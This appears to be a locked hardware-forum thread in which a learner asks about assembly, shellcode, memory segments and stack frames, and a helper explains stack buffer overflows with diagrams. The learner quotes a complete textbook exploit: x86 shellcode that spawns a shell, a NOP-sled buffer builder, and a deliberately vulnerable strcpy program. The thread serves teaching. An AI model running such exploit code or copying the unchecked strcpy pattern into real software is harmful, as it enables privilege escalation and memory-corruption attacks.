Tom's Guide | Tom's Hardware | Tom's Games
![]() |
![]() |
![]() |
Greetings,
I have been having trouble understanding stuff like pointers, so I tought reading about machine-level stuff like memory would help me to understand them better.
I have been reading this book, "Hacking - The Art of Exploitation" by Jon Erikson. I am reading this hopping it'll give me better understanding of what is happening "under the hood" of a running program.
Now, I got some questions, I hope you can answer:What is assembly language, what are its main features, should I try to understand it, were can I learn it?
What is shellcode, what is it suposed to do, how/were can I learn it.
What is bytecode, what is it suposed to do, how/were can I learn it.
What can you tell me about the various memory sagments? Text, Heap, Bss, Data and Stack. I think text is were all instructions are located, Stack is were all of the variables that are passed to a function go and Heap is were all the program's variables go. But I don't know what the remaining represent.
Is the EIP(Extended Instruction Pointer) always located in the text segment?
And for now I belive these are all of my questions. I hope you can answer all of them.
Thank you in advanceBest Regards
Deimos
AMD ATHLON X2 5200+ 2.6GHz
ASUS GeForce 8600GTS
ASUS M2N-E SLI MB
2xKingston 1GB DDR2 800

What is assembly language, what are its main features, should I try to understand it, were can I learn it?
The lowest level you can program in. Typically more compact, and thus faster than high-level languages' compiles. If you really want to know what a program is doing, sure. I donno, but I doubt information on x86 (and x64) is THAT hard to locate. (I'd start with Wikipedia.)What is shellcode, what is it supposed to do, how/were can I learn it.
An attack's payload. Depends on the attack. It's typically assembly.What is bytecode, what is it supposed to do, how/were can I learn it.
What Java and .NET code compile down to. The respective virtual machines then compile the byte code into relevant machine code. I'm sure both Sun and Microsoft have documentation on their bytecode somewhere.Text = Where the compiler stores machine code
Data = Variables initialized by programmer
BSS = Variables not initialized by programmer
Stack = Where programs store (smallish) sets of data. Used mostly for functions, especially in the presence of jmp, call, or ret.
Heap = Where programs store data. Typically larger than what's stored on the stack. If you create a variable with C++'s new or C's malloc, it goes to the heap.Is the EIP(Extended Instruction Pointer) always located in the text segment?
Now what fun would that be? (No. Otherwise, all of those remote code execution attacks wouldn't work.)

Thank for for your reply, it really helped.
I just have a couple more things I wanna get clarified:My book talked about a specific shellcode that "spawns a user shell", what is that exactly?
I know that when there is a function call first the arguments of that function are stored in the stack, then the return address were the EIP should return after the execution is finished, but I don't get what he calls "procedure prolog", what happens in this step?
In the stack, what is the EBP pointing to?
Are all of the memory segments independent or are they connected, for example, is the address 0x000000 unique or is there a 0x000000 in the heap and a different 0x000000 in the stack?
Best Regards
Deimos
AMD ATHLON X2 5200+ 2.6GHz
ASUS GeForce 8600GTS
ASUS M2N-E SLI MB
2xKingston 1GB DDR2 800

I don't get what he calls "procedure prolog", what happens in this step?
It saves the values of the registers. The procedure epilogue restores the old register values.In the stack, what is the EBP pointing to?
Traditionally, the working end of the stack.Are all of the memory segments independent or are they connected
They share the same address space. So does every piece of hardware in your computer, BTW. Side note: modern OS'es separate programs into individual address spaces, to keep them isolated. This is why a program can crash, and nothing else goes with it.

So, if inside the stack we have only one stack frame, that means the EBP is pointing to the end of that stack frame as well, right?
And if we subtract the function parameters' bytes plus the function arguments' bytes plus 8 (sum of the registers) from the EBP we got ourselves the beginning of the stack which is the sames as the beginning of the stack frame, correct?
AMD ATHLON X2 5200+ 2.6GHz
ASUS GeForce 8600GTS
ASUS M2N-E SLI MB
2xKingston 1GB DDR2 800

Not quite; my last post was kinda misleading, so I guess I should clear that up.
The EBP marks the edge of the current function. Everything before that (with the exception of return values) is mostly static; it's outside the current function. Everything after it is "alive".
The stack frame is everything between the EBP and the ESP. If it's not, you're either dealing with a compiler doing weird things with registers (see this MS guy for such an example), or a corrupted stack.
In theory, you should be able to walk the stack back to the beginning by going to where the EBP points. Then go to the location where that memory points. Repeat until you're at the beginning.
Also, this is one of the reasons I hate assembly. Register names.

I'm having quite some trouble understanding this, maybe I need to study more stuff...anyways I'd like to try a pratical example, see if it helps:
Program from my book:
exploit.c
[code]
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";
unsigned long sp(void) // This is just a little function
{ __asm__("movl %esp, %eax");} // used to return the stack pointer
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;
offset = 0; // Use an offset of 0
esp = sp(); // Put the current stack pointer into esp
ret = esp - offset; // We want to overwrite the ret address
printf("Stack pointer (ESP) : 0x%x\n", esp);
printf(" Offset from ESP : 0x%x\n", offset);
printf("Desired Return Addr : 0x%x\n", ret);
// Allocate 600 bytes for buffer (on the heap)
buffer = malloc(600);
// Fill the entire buffer with the desired ret address
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 600; i+=4)
{ *(addr_ptr++) = ret; }
// Fill the first 200 bytes of the buffer with NOP instructions
for(i=0; i < 200; i++)
{ buffer[i] = '\x90'; }
// Put the shellcode after the NOP sled
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }
// End the string
buffer[600-1] = 0;
// Now call the program ./vuln with our crafted buffer as its argument
execl("./vuln", "vuln", buffer, 0);
// Free the buffer memory
free(buffer);
return 0;
}vuln.c
int main(int argc, char *argv[])
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}[End Code]
I get the crafting the buffer part, 200 NOP instructions (which should make the EIP slide down to the shellcode), the shellcode and then a hole bunch of return addresses.
And when the vuln program is called it tries to copy the previously crafted buffer as an argument which will cause a segfault and the assignment of EIP to the return address which was overwritten either by NOPs or the 'ret'.I just don't get how the return address is calculated, what does the offset mean?
I feel I might be pushing your good will to help too far, but can you, please, write a short summary of what exactly occurs when the exploit program runs?
AMD ATHLON X2 5200+ 2.6GHz
ASUS GeForce 8600GTS
ASUS M2N-E SLI MB
2xKingston 1GB DDR2 800

Okay, I've been leaving you hanging for a while now, but I haven't had the time to type this up. Still, I should probably throw something up, so here it goes.
The concepts involved aren't particularly tricky, nor is it overly exotic; just about every C programmer has corrupted the stack and crashed their program. If the programmer is lucky, they'll get a segfault. If not, it's up to them to find out what is corrupting the stack.
That said, there's a few computer science-y type observations you have to make:
1. To computers, everything's a number. Memory addresses? Numbers. Machine code (CPU instructions)? Numbers. Any one of these letters? A number.2. A "string" is nothing more than a series of numbers called a character array. They're also called CStrings, because it's the closest C has to strings.
3. The computer cannot distinguish between one number and another. Therefore, C has decided a string needs to end with a '\0' (Or just 0, if you want).
So where do we stand right now? We know this C code:
char s[6];
s[0] = 'H'; s[1] = 'e'; s[2] = 'l'; s[3] = 'l'; s[4] = 'o'; s[5] = '\0';
produces:
0xF5 0xF6 0xF7 0xF8 0xF9 0xFA
+=====+=====+=====+=====+=====+=====+
| 'H' | 'e' | 'l' | 'l' | 'o' | 0 |
+=====+=====+=====+=====+=====+=====+
s[0] s[1] s[2] s[3] s[4] s[5]
Simple, right?4. The code s = "World" won't work. Why? You're trying to assign a series of numbers to a single slot. The solution? A bunch of functions designed to work with CStrings. In this case, we want this: strcpy(s, "World");. strcpy() will copy one byte after another, until it hits a '\0'. The basic logic looks like:
void strcpy(char *dest, char *source) {
while (*source != 0) { /*Yes, this loop can be compacted into a single line,*/
*dest = *source; /*but I'm trying to avoid confusion.*/
dest++; /*Also, expect the real strcpy() to be optimized*/
source++; /*beyond the single line variant.*/
}
}
Now we have:
0xF5 0xF6 0xF7 0xF8 0xF9 0xFA
+=====+=====+=====+=====+=====+=====+
| 'W' | 'o' | 'r' | 'l' | 'd' | 0 | (Notice the implicit '\0'
+=====+=====+=====+=====+=====+=====+ from "World".
s[0] s[1] s[2] s[3] s[4] s[5]These next few are the biggies:
5. There is nothing stopping you from going beyond (or overflowing) the array. s[6] = '!'; is perfectly legal. The best you can hope for is your complier throwing a warning. If not, you'll end up with
0xF5 0xF6 0xF7 0xF8 0xF9 0xFA 0xFB
+=====+=====+=====+=====+=====+=====+=====+
| 'W' | 'o' | 'r' | 'l' | 'd' | 0 | '!' |
+=====+=====+=====+=====+=====+=====+=====+
s[0] s[1] s[2] s[3] s[4] s[5]
Since we have s[] on the stack, the stack is now corrupted.6. Most of the time, we manipulate memory from lowest address to highest address. See? 0xF5 holds 'W'; 0xF6 holds 'o'; so on and so forth.
7. The stack doesn't. It moves from higher address to lower address as you add stuff. What does this mean? Whatever was in 0xFB has been overwritten, and replaced with '!'. At best, it was a local variable you no longer care about.
No, I don't know why the stack goes from high to low. I'm sure there was/is a perfectly valid reason. Maybe it made for a faster push on the 80186. I don't know, nor do I care enough to find out.
Yes, it would probably be slightly better to copy the string in reverse. We'd have the beginning of the string overflow instead of the end, but that's slower and requires (albeit trivially) more overhead. Besides, that wouldn't help the heap. It'd probably make the overflow a bit more obvious, though. In the following example, strcpy() would probably crash on its return. It may or may not write random data to random addresses, as well. (Hey, there's a reason why we call it undefined behavior.)
8. Where to go (in the code) after the function does its work is saved on the stack. Before any local variables.
9. Now, replace "CString" with "buffer."
tl; dr: Everything's a number; All boundaries are imaginary; The stack moves in the wrong direction; Overflows can overwrite our return address; Use strcpyn() instead of strcpy().
Example
Say we have a function, and this function starts off like this:void doStuff() {Its stack frame might sorta kinda like this:
char s[6];
s[0] = 'H'; s[1] = 'e'; s[2] = 'l'; s[3] = 'l'; s[4] = 'o'; s[5] = '\0';0xF5 0xF6 0xF7 0xF8 0xF9 0xFA 0xFB 0xFC 0xFD 0xFE 0xFFPerfectly reasonable so far, right? 0xF5 through 0xFA holds our char array. Our function uses the registers EBX, ECX, and ESI, so we save them in 0xFB through 0xFD. Address 0xFE holds our base pointer, and signifies the start of our stack frame. And 0xFF holds the star of this play. The return address. Held [not so] safely for whenever we leave this function. It'd be a shame if anything happened to it.
+=====+=====+=====+=====+=====+=====+=====+=====+=====+=====+=====+
| 'H' | 'E' | 'L' | 'L' | 'O' | 0 | EBX | ECX | ESI | EBP | EIP |
+=====+=====+=====+=====+=====+=====+=====+=====+=====+=====+=====+
s[0] s[1] s[2] s[3] s[4] s[5] <<- Saved register data ->>
(Let's ignore the fact that the registers are apparently only one byte)So, moving on. Let's say somewhere in this function we do this:
strcpy(s, "HelloWorld");Not even emoticons can save our stack now.
Our sorry stack now looks like this:
0xF5 0xF6 0xF7 0xF8 0xF9 0xFA 0xFB 0xFC 0xFD 0xFE 0xFF
+=====+=====+=====+=====+=====+=====+=====+=====+=====+=====+=====+
| 'H' | 'E' | 'L' | 'L' | 'O' | 'W' | 'o' | 'r' | 'l' | 'd' | 0 |
+=====+=====+=====+=====+=====+=====+=====+=====+=====+=====+=====+
s[0] s[1] s[2] s[3] s[4] s[5] <<- Overflow :( ->>
Our function goes about its business, and we're cleaning up. The stack is screwed up, but we don't know that. We shove 'o', 'r', and 'd', into EBX, ECX, and ESI, respectively. Our Extended [stack] Base Pointer points to 'd' ('d' == 0x64, FYI).Finally, EIP is loaded with 0. While I don't know exactly what that'll do, I do know it will crash this program. Probably with a segfault.
So let's take this one step further. We know how to overwrite the old EIP. What if we fill this string with code we want to run; code that the programmer never intended to run; code that the owner doesn't want us to run? Our restrictions? I'm not really sure; you're the one with the book. But off-hand, I'd guess the sky's the limit. As long as we can get our code in the program, and overwrite the EIP's return address to point to our code. That's the basic theory behind all of the buffer overflow attacks. Really, it's just like a virus infecting a cell.
Counters? Well, as programmers, we can be sure to validate any data someone gives us, and make sure we don't accept data past our buffers. As users? You could (and should) enable DEP.
Also: I'm sure I've screwed more than once. If anyone finds anything, as always, speak up. Please.

![]() |
![]() |
![]() |

This post is quite old and has been locked from receiving new replies. Please create a new posting instead.
| Ads by Google |